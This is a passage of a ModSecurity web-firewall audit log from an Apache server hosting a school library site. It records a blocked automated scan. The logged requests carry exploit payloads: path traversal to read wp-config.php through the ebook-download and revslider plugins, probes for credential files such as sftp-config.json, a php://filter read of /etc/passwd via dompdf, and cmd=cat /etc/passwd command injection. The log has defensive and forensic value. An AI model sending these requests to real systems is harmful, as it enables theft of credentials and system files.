CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2bbdf23-Z-- --ca440416-A-- [14/May/2025:04:46:58 +0700] aCO90sOlTOX2TmGW6__urAAAAMA 103.236.140.4 49080 103.236.140.4 8181 --ca440416-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875150 --ca440416-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ca440416-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172818042021 716 (- - -) Stopwatch2: 1747172818042021 716; combined=280, p1=249, p2=0, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca440416-Z-- --f0b43b4a-A-- [14/May/2025:04:46:58 +0700] aCO90sOlTOX2TmGW6__urQAAAMI 103.236.140.4 49084 103.236.140.4 8181 --f0b43b4a-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274768 --f0b43b4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0b43b4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172818240674 688 (- - -) Stopwatch2: 1747172818240674 688; combined=260, p1=227, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0b43b4a-Z-- --83c6832a-A-- [14/May/2025:04:47:00 +0700] aCO91MOlTOX2TmGW6__utwAAAM0 103.236.140.4 49088 103.236.140.4 8181 --83c6832a-B-- GET /.vscode/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274783 --83c6832a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --83c6832a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172820241476 608 (- - -) Stopwatch2: 1747172820241476 608; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83c6832a-Z-- --c50a4969-A-- [14/May/2025:04:47:00 +0700] aCO91MOlTOX2TmGW6__uuAAAAM8 103.236.140.4 49110 103.236.140.4 8181 --c50a4969-B-- GET /resources/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875168 --c50a4969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c50a4969-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172820439172 717 (- - -) Stopwatch2: 1747172820439172 717; combined=302, p1=269, p2=0, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c50a4969-Z-- --a41e1333-A-- [14/May/2025:04:47:00 +0700] aCO91MabX6K9rhby1vhKKwAAAI8 103.236.140.4 49114 103.236.140.4 8181 --a41e1333-B-- GET /ftp.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875171 --a41e1333-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a41e1333-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172820837640 1975 (- - -) Stopwatch2: 1747172820837640 1975; combined=735, p1=364, p2=344, p3=0, p4=0, p5=27, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a41e1333-Z-- --738bdb6a-A-- [14/May/2025:04:47:03 +0700] aCO918abX6K9rhby1vhKNgAAAIM 103.236.140.4 49114 103.236.140.4 8181 --738bdb6a-B-- GET /ftp.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274804 --738bdb6a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --738bdb6a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172823047222 1956 (- - -) Stopwatch2: 1747172823047222 1956; combined=723, p1=370, p2=327, p3=0, p4=0, p5=26, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --738bdb6a-Z-- --127e7c6f-A-- [14/May/2025:04:47:04 +0700] aCO92MabX6K9rhby1vhKOwAAAIY 103.236.140.4 49114 103.236.140.4 8181 --127e7c6f-B-- GET /ftps.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875195 --127e7c6f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --127e7c6f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172824050893 1922 (- - -) Stopwatch2: 1747172824050893 1922; combined=759, p1=341, p2=391, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --127e7c6f-Z-- --b894705e-A-- [14/May/2025:04:47:04 +0700] aCO92MabX6K9rhby1vhKPAAAAIg 103.236.140.4 49114 103.236.140.4 8181 --b894705e-B-- GET /ftp-config.conf HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274813 --b894705e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b894705e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172824249679 1809 (- - -) Stopwatch2: 1747172824249679 1809; combined=655, p1=306, p2=322, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b894705e-Z-- --1e73c978-A-- [14/May/2025:04:47:04 +0700] aCO92MabX6K9rhby1vhKPgAAAIk 103.236.140.4 49114 103.236.140.4 8181 --1e73c978-B-- GET /prevlaravel/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274816 --1e73c978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1e73c978-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172824648218 635 (- - -) Stopwatch2: 1747172824648218 635; combined=299, p1=266, p2=0, p3=0, p4=0, p5=32, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e73c978-Z-- --4bb8e83b-A-- [14/May/2025:04:47:04 +0700] aCO92MOlTOX2TmGW6__uuQAAANA 103.236.140.4 49158 103.236.140.4 8181 --4bb8e83b-B-- GET /sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875201 --4bb8e83b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4bb8e83b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172824845926 852 (- - -) Stopwatch2: 1747172824845926 852; combined=388, p1=351, p2=0, p3=0, p4=0, p5=36, sr=160, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bb8e83b-Z-- --5656360f-A-- [14/May/2025:04:47:15 +0700] aCO948OlTOX2TmGW6__u7gAAANU 103.236.140.4 49162 103.236.140.4 8181 --5656360f-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875281 --5656360f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5656360f-E-- --5656360f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172835727159 1671 (- - -) Stopwatch2: 1747172835727159 1671; combined=533, p1=374, p2=133, p3=0, p4=0, p5=26, sr=89, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5656360f-Z-- --57ba3c48-A-- [14/May/2025:04:47:15 +0700] aCO948OlTOX2TmGW6__u7wAAANc 103.236.140.4 49162 103.236.140.4 8181 --57ba3c48-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274900 --57ba3c48-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --57ba3c48-E-- --57ba3c48-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172835926671 1641 (- - -) Stopwatch2: 1747172835926671 1641; combined=478, p1=351, p2=100, p3=0, p4=0, p5=26, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ba3c48-Z-- --9d364f05-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u8AAAANg 103.236.140.4 49162 103.236.140.4 8181 --9d364f05-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875284 --9d364f05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9d364f05-E-- --9d364f05-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172836124940 1571 (- - -) Stopwatch2: 1747172836124940 1571; combined=458, p1=338, p2=93, p3=0, p4=0, p5=26, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d364f05-Z-- --3f3a1156-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u8QAAANY 103.236.140.4 49162 103.236.140.4 8181 --3f3a1156-B-- GET /php/ping.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274903 --3f3a1156-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3f3a1156-E-- --3f3a1156-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/ping.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172836322983 1659 (- - -) Stopwatch2: 1747172836322983 1659; combined=509, p1=379, p2=104, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f3a1156-Z-- --e8882758-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u8gAAAMA 103.236.140.4 49162 103.236.140.4 8181 --e8882758-B-- GET /php/file.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875287 --e8882758-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e8882758-E-- --e8882758-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/file.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172836521708 1400 (- - -) Stopwatch2: 1747172836521708 1400; combined=442, p1=322, p2=93, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8882758-Z-- --51f83b2b-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u8wAAAME 103.236.140.4 49162 103.236.140.4 8181 --51f83b2b-B-- GET 